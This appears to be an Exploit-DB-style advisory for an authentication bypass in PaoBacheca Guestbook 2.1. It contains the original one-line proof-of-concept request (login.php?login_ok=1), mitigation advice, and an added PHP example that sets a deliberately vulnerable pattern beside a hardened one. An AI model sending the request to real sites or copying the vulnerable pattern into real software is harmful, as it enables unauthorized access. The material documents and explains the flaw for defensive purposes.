Vendor: Guestbook
By: SirGod
CVSS: 5.5 (MEDIUM)
Authentication Bypass
CWE: 287
Product Name: Guestbook
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
2009

PaoBacheca Guestbook 2.1 (login_ok) Authentication Bypass Vulnerability

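This exploit allows an attacker to bypass the authentication mechanism in PaoBacheca Guestbook 2.1. When PHP runs with register_globals = on, requesting login.php with the 'login_ok' parameter set to 1 in the URL gives the attacker unauthorized access to the system. With that setting, PHP creates a global variable from each request parameter, so the value in the URL arrives in the script as $login_ok.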

Mitigation:

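The vendor should update the software to fix this vulnerability. Users are advised to apply the latest patch or upgrade to a newer version of the software; the entry above lists no patch for 2.1. Since the bypass requires register_globals = on, disabling that PHP setting removes the precondition for it.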
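
The coding pattern behind this class of bug, next to a hardened form, as an added example (not PaoBacheca's code, whose source does not appear on this page). Every name except login_ok is hypothetical, the password check is an assumption, and extract() stands in for register_globals, which PHP removed in 5.4.

```php
<?php
// Added illustration, NOT PaoBacheca source. Names other than login_ok are hypothetical.

// Vulnerable pattern. extract() emulates register_globals = on: every
// request parameter becomes a variable in scope before the logic runs.
function vulnerable_login(array $request, string $storedHash): bool
{
    extract($request, EXTR_SKIP);   // what register_globals did implicitly
    if (isset($password) && is_string($password)
        && password_verify($password, $storedHash)) {
        $login_ok = 1;              // set only on success ...
    }
    // ... and never initialised, so a request parameter can supply it.
    return !empty($login_ok);
}

// Hardened pattern. The flag has a known starting value, request data is
// read by explicit key, and the result is kept in server-side session
// state that the client cannot write to.
function hardened_login(array $request, array &$session, string $storedHash): bool
{
    $session['login_ok'] = $session['login_ok'] ?? false;
    $password = $request['password'] ?? null;
    if (is_string($password) && password_verify($password, $storedHash)) {
        $session['login_ok'] = true;
    }
    return $session['login_ok'] === true;
}

// Constructed sample input (not taken from a real installation).
$hash    = password_hash('correct horse', PASSWORD_DEFAULT);
$forged  = ['login_ok' => '1'];               // flag supplied by the client, no password
$genuine = ['password' => 'correct horse'];   // normal login attempt

$forgedSession  = [];
$genuineSession = [];

echo "vulnerable, forged flag: ";
var_dump(vulnerable_login($forged, $hash));
echo "hardened, forged flag:   ";
var_dump(hardened_login($forged, $forgedSession, $hash));
echo "hardened, real password: ";
var_dump(hardened_login($genuine, $genuineSession, $hash));
```

In a real application `$session` would be `$_SESSION` after `session_start()`, with `session_regenerate_id(true)` called on successful login.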

Exploit-DB raw data:

#############################################################################
[+] PaoBacheca Guestbook 2.1 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################

# milw0rm.com [2009-07-28]